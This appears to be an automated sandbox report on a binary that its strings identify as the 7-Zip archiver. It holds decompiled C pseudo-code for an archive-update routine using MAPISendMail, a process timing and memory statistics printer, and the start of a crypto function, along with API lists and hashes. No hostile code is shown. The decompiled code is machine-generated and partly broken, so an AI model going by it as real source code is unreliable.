                                                                                                                    0x00b3f170
                                                                                                                    0x00b3f0fd
                                                                                                                    0x00b3f100
                                                                                                                    0x00b3f104
                                                                                                                    0x00b3f109
                                                                                                                    0x00b3f10b
                                                                                                                    0x00b3f10b
                                                                                                                    0x00b3f113
                                                                                                                    0x00b3f116
                                                                                                                    0x00b3f11a
                                                                                                                    0x00b3f11f
                                                                                                                    0x00b3f121
                                                                                                                    0x00b3f124
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3f126
                                                                                                                    0x00b3f033
                                                                                                                    0x00b3f033
                                                                                                                    0x00b3f036
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3f03d
                                                                                                                    0x00b3f046
                                                                                                                    0x00b3f04b
                                                                                                                    0x00b3f04f
                                                                                                                    0x00b3f05a
                                                                                                                    0x00b3f05a
                                                                                                                    0x00b3f05e
                                                                                                                    0x00b3f060
                                                                                                                    0x00b3f067
                                                                                                                    0x00b3f069
                                                                                                                    0x00b3f06d
                                                                                                                    0x00b3f074
                                                                                                                    0x00b3f078
                                                                                                                    0x00b3f07b
                                                                                                                    0x00b3f086
                                                                                                                    0x00b3f086
                                                                                                                    0x00b3f089
                                                                                                                    0x00b3f07d
                                                                                                                    0x00b3f083
                                                                                                                    0x00b3f083
                                                                                                                    0x00b3f08c
                                                                                                                    0x00b3f093
                                                                                                                    0x00b3f093
                                                                                                                    0x00b3f067
                                                                                                                    0x00000000
                                                                                                                    0x00b3f05e
                                                                                                                    0x00b3f051
                                                                                                                    0x00b3f058
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3f058
                                                                                                                    0x00b3f031
                                                                                                                    0x00b3ede6
                                                                                                                    0x00b3edea
                                                                                                                    0x00b3edee
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3edf4
                                                                                                                    0x00b3edf7
                                                                                                                    0x00b3edf9
                                                                                                                    0x00b3edfc
                                                                                                                    0x00b3edfc
                                                                                                                    0x00b3edfe
                                                                                                                    0x00b3ee00
                                                                                                                    0x00b3ee00
                                                                                                                    0x00b3ee03
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee05
                                                                                                                    0x00b3ee06
                                                                                                                    0x00b3ee09
                                                                                                                    0x00b3ee0c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee10
                                                                                                                    0x00b3ee10
                                                                                                                    0x00b3ee13
                                                                                                                    0x00b3ee14
                                                                                                                    0x00b3ee14
                                                                                                                    0x00b3ee17
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee19
                                                                                                                    0x00b3ee1a
                                                                                                                    0x00b3ee1d
                                                                                                                    0x00b3ee20
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee22
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee14
                                                                                                                    0x00b3ee24
                                                                                                                    0x00b3ee24
                                                                                                                    0x00b3ee28
                                                                                                                    0x00b3ee28
                                                                                                                    0x00b3ee2b
                                                                                                                    0x00b3ee31
                                                                                                                    0x00b3ee31
                                                                                                                    0x00b3ee36
                                                                                                                    0x00b3ee3a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee44
                                                                                                                    0x00b3ee47
                                                                                                                    0x00b3ee49
                                                                                                                    0x00b3ee55
                                                                                                                    0x00b3ee58
                                                                                                                    0x00b3ee61
                                                                                                                    0x00b3ee6a
                                                                                                                    0x00b3ee73
                                                                                                                    0x00b3ee7c
                                                                                                                    0x00b3ee88
                                                                                                                    0x00b3ee8e
                                                                                                                    0x00b3ee93
                                                                                                                    0x00b3ee9c
                                                                                                                    0x00b3ee9d
                                                                                                                    0x00b3eea0
                                                                                                                    0x00b3eea9
                                                                                                                    0x00b3eeab
                                                                                                                    0x00b3eeb2
                                                                                                                    0x00b3eeb7
                                                                                                                    0x00b3eeba
                                                                                                                    0x00b3eee8
                                                                                                                    0x00b3eeeb
                                                                                                                    0x00b3eeed
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3eef3
                                                                                                                    0x00b3eef7
                                                                                                                    0x00b3eefd
                                                                                                                    0x00b3ef00
                                                                                                                    0x00b3ef04
                                                                                                                    0x00b3ef10
                                                                                                                    0x00b3ef1b
                                                                                                                    0x00b3ef25
                                                                                                                    0x00b3ef2b
                                                                                                                    0x00b3ef33
                                                                                                                    0x00b3ef37
                                                                                                                    0x00b3ef42
                                                                                                                    0x00b3ef44
                                                                                                                    0x00b3ef47
                                                                                                                    0x00b3ef4c
                                                                                                                    0x00b3ef4e
                                                                                                                    0x00b3ef56
                                                                                                                    0x00b3ef59
                                                                                                                    0x00b3ef5b
                                                                                                                    0x00b3ef5d
                                                                                                                    0x00b3ef61
                                                                                                                    0x00b3ef6d
                                                                                                                    0x00b3ef7a
                                                                                                                    0x00b3ef7a
                                                                                                                    0x00b3ef7c
                                                                                                                    0x00b3ef7f
                                                                                                                    0x00b3ef8f
                                                                                                                    0x00b3ef8f
                                                                                                                    0x00b3ef94
                                                                                                                    0x00b3ef97
                                                                                                                    0x00b3ef97
                                                                                                                    0x00b3ef5b
                                                                                                                    0x00b3efa0
                                                                                                                    0x00b3efab
                                                                                                                    0x00b3efaf
                                                                                                                    0x00b3efb5
                                                                                                                    0x00b3ef04
                                                                                                                    0x00000000
                                                                                                                    0x00b3eef7
                                                                                                                    0x00b3eebc
                                                                                                                    0x00b3eec2
                                                                                                                    0x00b3eed3
                                                                                                                    0x00b3eed3
                                                                                                                    0x00000000
                                                                                                                    0x00b3eec2
                                                                                                                    0x00b3ee4b
                                                                                                                    0x00b3ee4b
                                                                                                                    0x00000000
                                                                                                                    0x00b3ee4b
                                                                                                                    0x00b3ed3e
                                                                                                                    0x00b3ed49
                                                                                                                    0x00b3ed4d
                                                                                                                    0x00b3ed5f
                                                                                                                    0x00b3ed64
                                                                                                                    0x00b3ed6b
                                                                                                                    0x00b3ed78
                                                                                                                    0x00b3ed7e
                                                                                                                    0x00b3ed83
                                                                                                                    0x00b3ed89
                                                                                                                    0x00b3ed8f
                                                                                                                    0x00b3ed95
                                                                                                                    0x00b3eda1
                                                                                                                    0x00b3eda7
                                                                                                                    0x00b3edad
                                                                                                                    0x00b3edbe
                                                                                                                    0x00b3edbf
                                                                                                                    0x00b3edca
                                                                                                                    0x00b3edce
                                                                                                                    0x00000000
                                                                                                                    0x00b3edce
                                                                                                                    0x00b3eced
                                                                                                                    0x00b3ecf0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ecf2
                                                                                                                    0x00000000
                                                                                                                    0x00b3ecf2
                                                                                                                    0x00b3ecaf
                                                                                                                    0x00b3ecb8
                                                                                                                    0x00b3ecc1
                                                                                                                    0x00b3ecc4
                                                                                                                    0x00b3eccb
                                                                                                                    0x00b3ecd0
                                                                                                                    0x00b3ecd4
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ecd6
                                                                                                                    0x00000000
                                                                                                                    0x00b3ecd6
                                                                                                                    0x00b3ebfa
                                                                                                                    0x00b3ec03
                                                                                                                    0x00b3ec09
                                                                                                                    0x00b3ec0c
                                                                                                                    0x00b3ec11
                                                                                                                    0x00b3ec13
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ebd6
                                                                                                                    0x00b3ebe1
                                                                                                                    0x00b3ec15
                                                                                                                    0x00b3ec23
                                                                                                                    0x00b3ec29
                                                                                                                    0x00b3ec31
                                                                                                                    0x00b3ec36
                                                                                                                    0x00b3ec44
                                                                                                                    0x00b3ec49
                                                                                                                    0x00b3ec49
                                                                                                                    0x00b3ec49
                                                                                                                    0x00b3ec55
                                                                                                                    0x00000000
                                                                                                                    0x00b3ec55
                                                                                                                    0x00b3ebd4
                                                                                                                    0x00b3eb4f
                                                                                                                    0x00b3eb54
                                                                                                                    0x00000000
                                                                                                                    0x00b3eb54
                                                                                                                    0x00b3eb09
                                                                                                                    0x00b3eb0f
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3eb13
                                                                                                                    0x00000000
                                                                                                                    0x00b3eaea
                                                                                                                    0x00b3eaea
                                                                                                                    0x00b3eaea
                                                                                                                    0x00b3eb59
                                                                                                                    0x00b3eb67
                                                                                                                    0x00b3eb6d
                                                                                                                    0x00b3eb75
                                                                                                                    0x00b3eb7a
                                                                                                                    0x00b3eb88
                                                                                                                    0x00b3fb78
                                                                                                                    0x00b40157
                                                                                                                    0x00b40157
                                                                                                                    0x00b40161
                                                                                                                    0x00b40166
                                                                                                                    0x00000000
                                                                                                                    0x00b40166
                                                                                                                    0x00b3eae8
                                                                                                                    0x00b3ea35
                                                                                                                    0x00b3ea3f
                                                                                                                    0x00b3ea40
                                                                                                                    0x00b3ea4e
                                                                                                                    0x00000000
                                                                                                                    0x00b3ea4e
                                                                                                                    0x00b3ea0a
                                                                                                                    0x00b3ea0d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ea0f
                                                                                                                    0x00b3ea16
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3ea1b
                                                                                                                    0x00b3ea1c
                                                                                                                    0x00b3ea1d
                                                                                                                    0x00b3e9e2
                                                                                                                    0x00b3e9ea
                                                                                                                    0x00000000
                                                                                                                    0x00b3e9ea
                                                                                                                    0x00b3e9fa
                                                                                                                    0x00b3e9fa
                                                                                                                    0x00000000
                                                                                                                    0x00b3e9fa
                                                                                                                    0x00b3e9db
                                                                                                                    0x00b3e9dc
                                                                                                                    0x00b3e9dd
                                                                                                                    0x00000000
                                                                                                                    0x00b3e9dd
                                                                                                                    0x00b3e989
                                                                                                                    0x00b3e98c
                                                                                                                    0x00b3e98e
                                                                                                                    0x00b3e994
                                                                                                                    0x00b3e999
                                                                                                                    0x00b3e99a
                                                                                                                    0x00b3e9a4
                                                                                                                    0x00b3e9a4
                                                                                                                    0x00b3e9a9
                                                                                                                    0x00b3e9ad
                                                                                                                    0x00b3ec87
                                                                                                                    0x00b3ec87
                                                                                                                    0x00000000
                                                                                                                    0x00b3e9b3
                                                                                                                    0x00b3e9b3
                                                                                                                    0x00b3e9b6
                                                                                                                    0x00b3e9b9
                                                                                                                    0x00b3e9be
                                                                                                                    0x00b3e9c0
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e9c6
                                                                                                                    0x00b3e9ad
                                                                                                                    0x00b3e936
                                                                                                                    0x00b3e93a
                                                                                                                    0x00b3ec9c
                                                                                                                    0x00000000
                                                                                                                    0x00b3e940
                                                                                                                    0x00b3e946
                                                                                                                    0x00b3e94b
                                                                                                                    0x00b3e94c
                                                                                                                    0x00b3e956
                                                                                                                    0x00000000
                                                                                                                    0x00b3e956
                                                                                                                    0x00b3e93a
                                                                                                                    0x00b3e8c0
                                                                                                                    0x00b3e8c2
                                                                                                                    0x00b3e8d5
                                                                                                                    0x00b3e8d5
                                                                                                                    0x00000000
                                                                                                                    0x00b3e8d5
                                                                                                                    0x00b3e8c4
                                                                                                                    0x00b3e8c9
                                                                                                                    0x00b3e8d1
                                                                                                                    0x00b3e8d3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e8d3
                                                                                                                    0x00b3e76d
                                                                                                                    0x00b3e778
                                                                                                                    0x00b3e77b
                                                                                                                    0x00b3e78b
                                                                                                                    0x00b3e78e
                                                                                                                    0x00b3e798
                                                                                                                    0x00b3e7a5
                                                                                                                    0x00b3e7a6
                                                                                                                    0x00b3e7ab
                                                                                                                    0x00b3e7b1
                                                                                                                    0x00b3e7d3
                                                                                                                    0x00b3e7d7
                                                                                                                    0x00b3e7dd
                                                                                                                    0x00b3e7e6
                                                                                                                    0x00b3e7e8
                                                                                                                    0x00b3e842
                                                                                                                    0x00b3e849
                                                                                                                    0x00b3e84b
                                                                                                                    0x00000000
                                                                                                                    0x00b3e84d
                                                                                                                    0x00b3e850
                                                                                                                    0x00b3e85b
                                                                                                                    0x00000000
                                                                                                                    0x00b3e85b
                                                                                                                    0x00b3e7ea
                                                                                                                    0x00b3e7f6
                                                                                                                    0x00b3e7fb
                                                                                                                    0x00b3e7ff
                                                                                                                    0x00b3e80a
                                                                                                                    0x00b3e80e
                                                                                                                    0x00b3e817
                                                                                                                    0x00b3e81c
                                                                                                                    0x00b3e81e
                                                                                                                    0x00b3e826
                                                                                                                    0x00b3e82b
                                                                                                                    0x00b3e82b
                                                                                                                    0x00b3e832
                                                                                                                    0x00b3e836
                                                                                                                    0x00b3e83b
                                                                                                                    0x00b3e840
                                                                                                                    0x00b3e87a
                                                                                                                    0x00b3e880
                                                                                                                    0x00b3e880
                                                                                                                    0x00b3e880
                                                                                                                    0x00b3e88f
                                                                                                                    0x00000000
                                                                                                                    0x00b3e895
                                                                                                                    0x00000000
                                                                                                                    0x00b3e840
                                                                                                                    0x00b3e7b3
                                                                                                                    0x00b3e7be
                                                                                                                    0x00b3e7c3
                                                                                                                    0x00b3e85d
                                                                                                                    0x00b3e86e
                                                                                                                    0x00000000
                                                                                                                    0x00b3e874
                                                                                                                    0x00b3e7b1
                                                                                                                    0x00b3e753
                                                                                                                    0x00b3e757
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e757
                                                                                                                    0x00b3e70a
                                                                                                                    0x00b3e70d
                                                                                                                    0x00b3e718
                                                                                                                    0x00b3e71b
                                                                                                                    0x00b3e71b
                                                                                                                    0x00b3e71e
                                                                                                                    0x00b3e71e
                                                                                                                    0x00b3e721
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e727
                                                                                                                    0x00b3e728
                                                                                                                    0x00b3e72b
                                                                                                                    0x00b3e72e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e72e
                                                                                                                    0x00b3e71e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b3e6fa
                                                                                                                    0x00b3e6fa
                                                                                                                    0x00b3e6fa
                                                                                                                    0x00b40228
                                                                                                                    0x00b4022d
                                                                                                                    0x00b40236
                                                                                                                    0x00b40236

                                                                                                                    APIs
                                                                                                                    • __EH_prolog.LIBCMT ref: 00B3E6AC
                                                                                                                      • Part of subcall function 00B15549: __EH_prolog.LIBCMT ref: 00B1554E
                                                                                                                      • Part of subcall function 00B11E89: free.MSVCRT(?,00B36CD6,00000000,00000000,00000001,?,00B110EB), ref: 00B11E8D
                                                                                                                      • Part of subcall function 00B16FC5: __EH_prolog.LIBCMT ref: 00B16FCA
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B902C0), ref: 00B3E956
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B902C0), ref: 00B3E9A4
                                                                                                                    • GetProcAddress.KERNEL32(00000000,MAPISendMail), ref: 00B3FB86
                                                                                                                      • Part of subcall function 00B3E3D5: __EH_prolog.LIBCMT ref: 00B3E3DA
                                                                                                                    • wcscmp.MSVCRT ref: 00B3F0F1
                                                                                                                    • _CxxThrowException.MSVCRT(?,00B949E0), ref: 00B3F170
                                                                                                                    • memset.MSVCRT ref: 00B3FD9A
                                                                                                                    • memset.MSVCRT ref: 00B3FDD5
                                                                                                                    • memset.MSVCRT ref: 00B3FE10
                                                                                                                    • CompareFileTime.KERNEL32(?,00000018,?,00000000,?,00000000), ref: 00B3FFBD
                                                                                                                    • CompareFileTime.KERNEL32(?,-00000008), ref: 00B3FFD2
                                                                                                                      • Part of subcall function 00B3E1FE: __EH_prolog.LIBCMT ref: 00B3E203
                                                                                                                      • Part of subcall function 00B41B0E: __EH_prolog.LIBCMT ref: 00B41B13
                                                                                                                      • Part of subcall function 00B41B0E: ctype.LIBCPMT ref: 00B41B37
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: H_prolog$ExceptionThrowmemset$CompareFileTime$AddressProcctypefreewcscmp
                                                                                                                    • String ID: $7-Zip cannot find MAPISendMail function$GetFullPathName error$It is not allowed to include archive to itself$MAPISendMail$MAPISendMailW$Mapi32.dll$SFX file is not specified$Scanning error$The file already exists$The file is read-only$There is a folder with the name of archive$There is some data block after the end of the archive$cannot delete the file$cannot find specified SFX module$cannot load Mapi32.dll$cannot move the file$rsfx$stdout$N)w
                                                                                                                    • API String ID: 2048656472-4179485561
                                                                                                                    • Opcode ID: 9cc90db2212b1a9777959e55257f12290313fbe753497190b05c0555ab524f5d
                                                                                                                    • Instruction ID: 5e329deed3249677403c52c1f7ef8c1aa6a705d4169291280b5ab7e6927f395f
                                                                                                                    • Opcode Fuzzy Hash: 9cc90db2212b1a9777959e55257f12290313fbe753497190b05c0555ab524f5d
                                                                                                                    • Instruction Fuzzy Hash: C9039C31C00249DEDF25EBA8C995BEDBBF0AF15300F2440E9E44967292DB749F89DB61
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B4A7BC Relevance: 56.2, APIs: 17, Strings: 15, Instructions: 209libraryloadertimeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 69%
                                                                                                                    			E00B4A7BC() {
				int _v8;
				int _v12;
				struct HINSTANCE__* _v16;
				long _v20;
				int _v24;
				char _v28;
				struct HINSTANCE__* _v32;
				long _v36;
				struct _FILETIME _v44;
				struct _FILETIME _v52;
				void* _v56;
				struct _FILETIME _v60;
				intOrPtr _v64;
				signed int _v68;
				struct _FILETIME _v76;
				intOrPtr _v80;
				intOrPtr _v108;
				void _v116;
				void* __ebp;
				int _t54;
				struct HINSTANCE__* _t58;
				struct _IO_FILE** _t78;
				void* _t81;
				struct _IO_FILE** _t83;
				struct _IO_FILE** _t85;
				void* _t87;
				struct _IO_FILE** _t89;
				struct HINSTANCE__* _t94;
				void* _t100;
				struct _IO_FILE** _t114;
				void* _t121;
				void* _t126;
				_Unknown_base(*)()* _t134;
				intOrPtr* _t141;

				_t54 = GetProcessTimes(GetCurrentProcess(),  &_v60,  &_v76,  &_v44,  &_v52);
				if(_t54 != 0) {
					E00B1A540(_t54,  &_v68);
					memset( &_v116, 0, 0x28);
					_v12 = 0;
					_v8 = 0;
					_v28 = 0;
					_v24 = 0;
					_t58 = GetModuleHandleW(L"kernel32.dll");
					_v16 = _t58;
					_t134 = GetProcAddress(_t58, "K32GetProcessMemoryInfo");
					if(_t134 != 0) {
						L4:
						_v12 =  *_t134(GetCurrentProcess(),  &_v116, 0x28);
						L5:
						_t141 = GetProcAddress(_v16, "QueryProcessCycleTime");
						_t152 = _t141;
						if(_t141 != 0) {
							_v8 =  *_t141(GetCurrentProcess(),  &_v28);
						}
						_v16 = _v44.dwHighDateTime;
						_v20 = _v44.dwLowDateTime;
						_v32 = _v52.dwHighDateTime;
						_v36 = _v52.dwLowDateTime;
						_t132 = _v68;
						_t144 = _v64;
						_t137 = _t132 - _v60.dwLowDateTime;
						asm("sbb esi, ecx");
						E00B4AA48(_t132, _t152, _v20, _v16, _t132 - _v60.dwLowDateTime, _v64);
						_t100 = _v36 + _v20;
						asm("adc eax, [ebp-0xc]");
						_t153 = _v8;
						_v16 = _v32;
						if(_v8 != 0) {
							_t85 =  *0xb9a894; // 0xb9a5b0
							fputs("    Cnt:",  *_t85);
							_t87 = L00B7F310(_v28, _v24, 0xf4240, 0);
							_push(_t132);
							_push(_t87);
							_t132 = 0x20;
							_t126 = 0xf;
							E00B4A9F8(_t126, 0x20, _t153);
							_t89 =  *0xb9a894; // 0xb9a5b0
							fputs(" MCycles",  *_t89);
						}
						E00B4AA48(_t132, _t153, _v36, _v32, _t137, _t144);
						if(_v8 != 0) {
							_t78 =  *0xb9a894; // 0xb9a5b0
							fputs("    Freq (cnt/ptime):",  *_t78);
							if((L00B7F310(_t100, _v16, 0xa, 0) | _t132) == 0) {
								_t132 = 0;
								_t80 = 1;
							}
							_t81 = L00B7F310(_v28, _v24, _t80, _t132);
							_push(_t132);
							_push(_t81);
							_t132 = 0x20;
							_t121 = 6;
							E00B4A9F8(_t121, 0x20, 0);
							_t83 =  *0xb9a894; // 0xb9a5b0
							fputs(" MHz",  *_t83);
						}
						E00B4AA48(_t132, 0, _t100, _v16, _t137, _t144);
						_t157 = _v12;
						if(_v12 != 0) {
							_push(0);
							_push(_v80);
							E00B4AB6C("Virtual ", _t157);
						}
						E00B4AA48(_t132, _t157, _t137, _t144, _t137, _t144);
						_t158 = _v12;
						if(_v12 != 0) {
							_push(0);
							_push(_v108);
							E00B4AB6C("Physical", _t158);
						}
						_t114 =  *0xb9a894; // 0xb9a5b0
						return E00B11FE9(_t114);
					}
					_t94 = LoadLibraryW(L"Psapi.dll");
					if(_t94 == 0) {
						goto L5;
					}
					_t134 = GetProcAddress(_t94, "GetProcessMemoryInfo");
					if(_t134 == 0) {
						goto L5;
					}
					goto L4;
				}
				return _t54;
			}





































                                                                                                                    0x00b4a7d9
                                                                                                                    0x00b4a7e1
                                                                                                                    0x00b4a7ed
                                                                                                                    0x00b4a7fb
                                                                                                                    0x00b4a803
                                                                                                                    0x00b4a806
                                                                                                                    0x00b4a809
                                                                                                                    0x00b4a811
                                                                                                                    0x00b4a814
                                                                                                                    0x00b4a820
                                                                                                                    0x00b4a82b
                                                                                                                    0x00b4a82f
                                                                                                                    0x00b4a84e
                                                                                                                    0x00b4a85d
                                                                                                                    0x00b4a860
                                                                                                                    0x00b4a86a
                                                                                                                    0x00b4a86c
                                                                                                                    0x00b4a86e
                                                                                                                    0x00b4a87d
                                                                                                                    0x00b4a87d
                                                                                                                    0x00b4a891
                                                                                                                    0x00b4a897
                                                                                                                    0x00b4a8a3
                                                                                                                    0x00b4a8a6
                                                                                                                    0x00b4a8b0
                                                                                                                    0x00b4a8be
                                                                                                                    0x00b4a8c0
                                                                                                                    0x00b4a8c2
                                                                                                                    0x00b4a8d1
                                                                                                                    0x00b4a8dc
                                                                                                                    0x00b4a8df
                                                                                                                    0x00b4a8e2
                                                                                                                    0x00b4a8e6
                                                                                                                    0x00b4a8e9
                                                                                                                    0x00b4a8eb
                                                                                                                    0x00b4a8f7
                                                                                                                    0x00b4a90c
                                                                                                                    0x00b4a911
                                                                                                                    0x00b4a912
                                                                                                                    0x00b4a915
                                                                                                                    0x00b4a917
                                                                                                                    0x00b4a918
                                                                                                                    0x00b4a91d
                                                                                                                    0x00b4a929
                                                                                                                    0x00b4a930
                                                                                                                    0x00b4a93e
                                                                                                                    0x00b4a947
                                                                                                                    0x00b4a949
                                                                                                                    0x00b4a955
                                                                                                                    0x00b4a96e
                                                                                                                    0x00b4a972
                                                                                                                    0x00b4a974
                                                                                                                    0x00b4a974
                                                                                                                    0x00b4a97d
                                                                                                                    0x00b4a982
                                                                                                                    0x00b4a983
                                                                                                                    0x00b4a986
                                                                                                                    0x00b4a988
                                                                                                                    0x00b4a989
                                                                                                                    0x00b4a98e
                                                                                                                    0x00b4a99a
                                                                                                                    0x00b4a9a1
                                                                                                                    0x00b4a9ad
                                                                                                                    0x00b4a9b4
                                                                                                                    0x00b4a9b7
                                                                                                                    0x00b4a9b9
                                                                                                                    0x00b4a9bf
                                                                                                                    0x00b4a9c2
                                                                                                                    0x00b4a9c2
                                                                                                                    0x00b4a9d0
                                                                                                                    0x00b4a9d5
                                                                                                                    0x00b4a9d8
                                                                                                                    0x00b4a9da
                                                                                                                    0x00b4a9e0
                                                                                                                    0x00b4a9e3
                                                                                                                    0x00b4a9e3
                                                                                                                    0x00b4a9e8
                                                                                                                    0x00000000
                                                                                                                    0x00b4a9f5
                                                                                                                    0x00b4a836
                                                                                                                    0x00b4a83e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4a848
                                                                                                                    0x00b4a84c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00b4a84c
                                                                                                                    0x00b4a9f7

                                                                                                                    APIs
                                                                                                                    • GetCurrentProcess.KERNEL32(00000000,?,00B8E058,?), ref: 00B4A7D2
                                                                                                                    • GetProcessTimes.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00B49A69,00000000), ref: 00B4A7D9
                                                                                                                      • Part of subcall function 00B1A540: GetSystemTimeAsFileTime.KERNEL32(?,00B4A7F2,00000000,00000000,766E89A0), ref: 00B1A541
                                                                                                                    • memset.MSVCRT ref: 00B4A7FB
                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,00000000,766E89A0), ref: 00B4A814
                                                                                                                    • GetProcAddress.KERNEL32(00000000,K32GetProcessMemoryInfo), ref: 00B4A829
                                                                                                                    • LoadLibraryW.KERNEL32(Psapi.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00B49A69,00000000), ref: 00B4A836
                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetProcessMemoryInfo), ref: 00B4A846
                                                                                                                    • GetCurrentProcess.KERNEL32(?,00000028,?,?,?,?,?,?,?,?,?,?,?,?,?,00B49A69), ref: 00B4A854
                                                                                                                    • GetProcAddress.KERNEL32(?,QueryProcessCycleTime), ref: 00B4A868
                                                                                                                    • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00B49A69,00000000), ref: 00B4A874
                                                                                                                    • fputs.MSVCRT ref: 00B4A8F7
                                                                                                                    • __aulldiv.LIBCMT ref: 00B4A90C
                                                                                                                    • fputs.MSVCRT ref: 00B4A929
                                                                                                                    • fputs.MSVCRT ref: 00B4A955
                                                                                                                    • __aulldiv.LIBCMT ref: 00B4A965
                                                                                                                    • __aulldiv.LIBCMT ref: 00B4A97D
                                                                                                                    • fputs.MSVCRT ref: 00B4A99A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000D.00000002.683592501.0000000000B11000.00000020.00000001.01000000.00000008.sdmp, Offset: 00B10000, based on PE: true
                                                                                                                    • Associated: 0000000D.00000002.683584765.0000000000B10000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683731985.0000000000B89000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683757045.0000000000B9A000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    • Associated: 0000000D.00000002.683775176.0000000000BA2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_13_2_b10000_7g.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Processfputs$AddressCurrentProc__aulldiv$Time$FileHandleLibraryLoadModuleSystemTimesmemset
                                                                                                                    • String ID: Cnt:$ Freq (cnt/ptime):$ MCycles$ MHz$GetProcessMemoryInfo$Global $K32GetProcessMemoryInfo$Kernel $Physical$Process$Psapi.dll$QueryProcessCycleTime$User $Virtual $kernel32.dll
                                                                                                                    • API String ID: 4173168154-4201791934
                                                                                                                    • Opcode ID: 6aa8a7ed4e212ef9e5fc13bc1c39d19de52199f3b316b932cc97959057e2d0dd
                                                                                                                    • Instruction ID: 7275960eebb6ffa284dd60e33ffad454d427546b3ba8cf50558aafae2ebb37c0
                                                                                                                    • Opcode Fuzzy Hash: 6aa8a7ed4e212ef9e5fc13bc1c39d19de52199f3b316b932cc97959057e2d0dd
                                                                                                                    • Instruction Fuzzy Hash: F1616F72E40219BFDF14AFE4DC89DAEBBF9EB48700F14446AF511A31A0DA319940DB65
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00B2CDBD Relevance: 11.3, APIs: 7, Instructions: 760COMMONCrypto
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E00B2CDBD(char __ecx, unsigned int __edx, void* __eflags) {
				void* __edi;
				intOrPtr _t408;
				signed int _t409;
				void* _t417;
				signed int _t426;
				void* _t429;
				intOrPtr* _t435;
				void* _t438;
				void* _t439;
				void* _t440;
				void* _t447;
				void* _t455;
				void* _t458;
				intOrPtr _t460;
				void* _t463;
				intOrPtr* _t469;
				signed int _t472;
				void* _t479;
				signed int _t484;
				signed int _t487;
				signed int _t495;
				intOrPtr _t498;
				signed int _t508;
				void* _t521;
				void* _t524;
				void* _t535;
				unsigned int _t539;
				void* _t540;
				void* _t543;
				void* _t552;
				void* _t554;
				void* _t560;
				void* _t564;
				signed int _t568;
				signed int _t569;
				signed int _t597;
				signed int _t612;
				signed int _t622;
				signed int _t623;
				signed int _t624;
				signed int _t638;
				void* _t647;
				void* _t648;
				void* _t649;
				unsigned int _t653;
				void* _t654;
				void* _t655;
				void* _t657;
